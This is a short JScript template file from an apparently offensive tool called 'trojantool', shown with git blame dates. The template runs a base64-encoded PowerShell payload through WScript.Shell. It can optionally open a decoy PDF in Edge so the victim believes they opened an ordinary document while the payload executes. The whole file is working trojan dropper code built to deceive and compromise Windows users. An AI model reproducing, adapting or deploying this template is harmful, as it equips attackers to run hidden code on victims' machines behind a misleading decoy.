trojantool/cmd/jscript.gojs

15 lines
433 B
Plaintext
Raw Permalink Normal View History

2023-08-30 08:57:28 +02:00
var base64EncodedBinary = "{{.Encoded}}";
2023-08-10 21:42:41 +02:00
var shell = new ActiveXObject("WScript.Shell");
2023-08-30 08:57:28 +02:00
var command = "powershell.exe -encodedcommand " + base64EncodedBinary;
shell.Run(command, 1, true);
2023-08-10 21:42:41 +02:00
2023-08-10 21:53:50 +02:00
{{if len .EncodedDecoy}}
2023-08-30 08:57:28 +02:00
var dataUri = "data:application/pdf;base64,{{.EncodedDecoy}}";
2023-08-10 21:42:41 +02:00
2023-08-30 08:57:28 +02:00
var shell = new ActiveXObject("Shell.Application");
shell.ShellExecute("msedge.exe", dataUri, "", "open", 1);
2023-08-10 21:42:41 +02:00
2023-08-10 21:53:50 +02:00
{{end}}
{{/* vim: syntax=javascript */}}